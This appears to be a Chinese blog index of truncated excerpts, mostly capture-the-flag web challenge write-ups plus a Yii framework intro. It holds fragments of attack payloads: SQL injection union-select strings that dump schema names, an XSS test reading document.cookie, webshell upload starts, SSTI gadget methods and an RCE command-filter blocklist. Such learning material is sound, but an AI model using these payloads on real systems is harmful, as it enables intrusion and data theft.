简介Yii是一个适用于开发Web2.0应用程序的高性能PHP框架 Yii是一个通用的WEB编程框架，即可以用于开发各种用PHP构建的Web应用。因为基于组件的框架结构和设计精巧的缓存支持，它特别适合开发大型应用，如门户网站、社区、内容管理系统(CMS)、电子商务项目和RESTful Web服务等。 Yii当前有两个主要版本：1.1和2.0。1.1版是上代的老版本，现在处于维护状态。2.0版是一个完

ezmd5这题和之前的文件上传题有点不一样，有两个上传，先传入一句话木马，回显只能jpg，加GIF89a也不行，试到最后发现会检查jpg16进制文件头，但回显得页面很明显让传入的两个图片的MD5值相同那么网上搜搜，感觉自己弄很难构造传送门 这 2 张图像具有相同的 md5 哈希值：253dd04e87492e4fc3471de5e776bc3d ezhttp先看源码，注释说为了防止忘记密码，我把

前言SQL注入(SQL Injection)是一种常见的Web安全漏洞，形成的主要原因是web应用程序在接受相关数据参数时未做好过滤，将其直接带入到数据库中查询，导致攻击者可以拼接执行构造的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。SQL就是一种数据库查询语言。 我们都知道web分为前端和后端，前端负责数据显示，后端负责处理来自前端的请求并提供前端显示的资源,既然有资源，那么就

web517 –Less-1直接payload 1234?id=-1' order by 3--+//order by 4就会出错，说明回显位有三个?id=-1' union select 1,2,3--+//回显2，3说明2，3为回显位 先浅浅爆个库 1?id=-1' union select 1,2,group_concat(schema_name) from i

圣杯战争！！！反序列化题 123456789101112131415161718192021222324252627282930313233343536373839404142 <?phphighlight_file(__FILE__);error_reporting(0);class artifact{ public $excalibuer; public $arro

EzHttp请post传参username和password进行登录那么我们随便post显示密码错误查看源码发现密码被藏在页面中查找没有结果用dirsearch搜一下搜到了robots.txt 123User-agent: *Disallow: /o2takuXX's_username_and_password.txt 进入获得账户密码，返回第一个界面输入 12username:admi

[WEEK1]babyRCE12345678910111213<?php$rce = $_GET['rce'];if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<

SSTI漏洞原理SSTI漏洞原理常用方法 1234567891011121314151617181920212223242526272829__class__ 查看对象所在的类__mro__ 查看继承关系和调用顺序，返回元组__base__ 返回基类__bases__ 返回基类元组__subclasses__()

xss漏洞xss漏洞原理 web316有一个输入框输入一个简单的script代码测试一下是否有xss漏洞 1<script>alert('hah')</script> 生成了一个警告框，说明有xss漏洞 12<script>alert(document.cookie)</script>//flag=you%20are%20not%

web泄漏的秘密输入www.zip下载flag在index.php和robots.txt中拼接起来为flag 1flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous} Begin of Upload文件上传题，没有过滤上传一个1.png(对上传有筛查，只允许png，jpg等等图片格式) 12GIF89A<?php ev